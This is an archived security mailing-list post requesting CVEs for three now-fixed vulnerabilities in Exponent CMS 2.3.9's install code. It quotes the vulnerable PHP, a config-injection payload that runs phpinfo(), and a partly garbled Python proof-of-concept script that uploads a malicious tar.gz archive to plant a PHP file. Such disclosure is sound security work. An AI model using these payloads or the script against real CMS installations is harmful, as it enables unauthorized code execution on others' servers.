Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 22 Sep 2016 21:35:46 +0800
From: Carl Peng <>
Subject: CVE Request - Exponent CMS 2.3.9 multi-vulnerabilities in install code

Hi , I reported the following vulnerabilities in the install code to the
ExponentCMS team some days ago and fixed now.

1. Arbitrary code execution
lines 56 - 63
if (isset($_REQUEST['sc'])) {
    if (file_exists("../framework/conf/config.php")) {
        // Update the config
        foreach ($_REQUEST['sc'] as $key => $value) {
//            $value = expString::sanitize($value);
            expSettings::change($key, $value);
The function of the expSettings::change() is to modify the config
file("framework/conf/config.php"), but there is failed to filter user input
lead to we could write anything to config file.

Proof of concept:[SMTP_PORT]=25\\');phpinfo();//
  phpinfo() will be executed.
Visit "[SMTP_PORT]=25 " can
be recovery it.

2. RCE vulnerability
if (isset($_REQUEST['profile'])) {
    expSettings::activateProfile($_REQUEST['profile']); //here
    expTheme::removeSmartyCache(); //FIXME is this still necessary?
    flash('message', gt("New Configuration Profile Loaded"));
    header('Location: ../index.php');
expSettings::activateProfile() :
copy(BASE . "framework/conf/profiles/$profile.php", BASE .
"framework/conf/config.php"); //here
// tag it with the profile name
$fh = fopen(BASE . "framework/conf/config.php", "a");
We can upload a "php" file to website, then copy it to

Proof of concept:
first, We first upload a "php" to website (by “uploader_paste.php”), such
as /files/test.php
then visit,
then will copy "/files/test.php" to "framework/conf/config.php".

3. File Upload vulnerability
$files = BASE . "themes/" . DISPLAY_THEME_REAL . "/" .
$_REQUEST['install_sample'] . ".tar.gz";
if (!file_exists($files)) {
    $files = BASE . "install/samples/" . $_REQUEST['install_sample'] .
".tar.gz"; //here
if (file_exists($files)) { // only install if there was an archive
    include_once(BASE . 'external/Tar.php');
    $tar = new Archive_Tar($files); //Extract .tar.gz file
    $return = $tar->extract(BASE);
The function of those code is extract .tar.gz file, but through
"install_sample", the parameter of "$files" is what we can control, so we
could upload a .tar.gz evil file, then extract it.

Proof of concept:
first, upload .eql and .tar.gz files(by “uploader_paste.php”),such as
then visit
Successfully extract file:

python poc code:
import random
import requests
host = ''

def upload(name, url):
files = {'upload' : (name, open('evil.tar.gz'))}
resp =, files=files)
return resp.content

if 'http://' not in host: host = 'http://{}'.format(host)

host = host.rstrip('/')
url = '{}/framework/modules/file/connector/uploader_paste.php'.format(host)
rstr = random.randint(10,99)

req_eql = upload('{}.eql'.format(rstr), url)
req_tar = upload('{}.tar.gz'.format(rstr), url)

if 'tar.gz' in req_tar:
req_inc =

evilfile = '{}/3.php'.format(host)
req_ = requests.get(evilfile)

if 'GIF89a' in req_.content:
print evil-file

And now, all vulnerabilities have been fixed.

these issues was reported by Peng Hua of Inc. and I would
to request  CVEs for these issues (if not done so).


Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ